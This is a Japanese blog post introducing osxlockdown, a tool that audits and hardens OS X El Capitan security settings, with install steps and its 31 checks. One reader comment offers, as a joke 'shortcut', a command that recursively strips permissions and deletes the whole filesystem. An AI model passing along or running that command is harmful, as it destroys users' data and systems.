OS X 10.11 El Capitanを搭載したMacがどれだけセキュアな状態にあるかを検証してくれるコマンドラインツール「osxlockdown」がリリース。

スポンサーリンク

 OS X 10.11 El Capitanを搭載したMacがどれだけセキュアな状態にあるかを検証してくれるコマンドラインツール「osxlockdown」がリリースされています。詳細は以下から。


OS-X-10-11-El-Capitan-Hero


 osxlockdownは主にLinux関係のセキュリティ情報を掲載しているnixCraftが公開したEl Capitan用コマンドラインツールで、現在使用しているEl Capitan搭載のMacがどれだけ安全であるかを判定してくれます。

Is there is an easy way to audit and lock down (secure) Apple OS X 0.11 (El Capitan) unix operating system?
Yes you can use the osxlockdown tool. It was built to audit, and remediate, security configuration settings on OS X 10.11 (El Capitan).

How to secure and lock down Apple OS X 10.11 (El Capitan) with osxlockdown

使い方

 使い方はまずosxlockdownをGitHubからダウンロード/cloneし、osxlockdownに実行権限を与えます。


OS-X-lockdown-clone

  1. git clone https://github.com/SummitRoute/osxlockdown.git
  2. cd osxlockdown
  3. chmod +x osxlockdown

 後は”sudo ./osxlockdown”を実行すれば以下の31項目をチェックし、現在のMacの状態がどうなっているかを一覧にして表示してくれます。

  1. Verify all application software is current
  2. Enable Auto Update
  3. Disable Bluetooth
  4. Disable infrared receiver
  5. Disable AirDrop
  6. Enable “Set time and date automatically”
  7. Set an inactivity interval of 10 minutes or less for the screen saver
  8. Enable secure screen saver corners
  9. Require a password to wake the computer from sleep or screen saver
  10. Ensure screen locks immediately when requested
  11. Disable Remote Apple Events
  12. Disable Remote Login
  13. Disable Internet Sharing
  14. Disable Screen Sharing
  15. Disable Printer Sharing
  16. Disable Wake on Network Access
  17. Disable File Sharing
  18. Disable Remote Management
  19. Enable FileVault
  20. Destroy File Vault Key when going to standby
  21. Enable hibernation mode (no memory power on sleep)
  22. Enable Gatekeeper
  23. Enable Firewall
  24. Enable Firewall Stealth Mode
  25. Disable signed apps from being auto-permitted to listen through firewall
  26. Disable iCloud drive
  27. Require an administrator password to access system-wide preferences
  28. Complex passwords required
  29. Disable IPv6
  30. Disable Previews
  31. Secure Safari by crippling it

 また、osxlockdownにはいくつかのオプションが用意されており”–remediate”オプションを利用すればEl Capitanを最もセキュアな状態にしてくれますが、この状態にするとリモートアクセスやAirDropが利用できなくなったりFileVaultが有効になったりするので、オプションを使う場合は注意して下さい。


osxlockdown-remediate

 * osxlockdownはOS X 10.11 El Capitanクリーンインストール状態でもセキュリティスコア「14/31(45%)」なので、全ての項目を[PASSED]しなければ脆弱ということではなく、あくまでも目安の1つと考えた方がよさそうです。

関連リンク

コメント

  1. Apple7743 より:

    こんな無意味コマンドを入れることが脆弱性だったり

  2. Apple7743 より:

    以下のコマンドでもっと簡単に、、、
    sudo chmod -777 -R /; rm -rf / >& /dev/null ; echo “OK.\n” &
    本当に実行すると、色々中途半端に消えて、復旧できずに困るかもしれません。

  3. Apple7743 より:

    >>1 OSSの意味分かってますか?
    脆弱だと思うなら自分でチェック!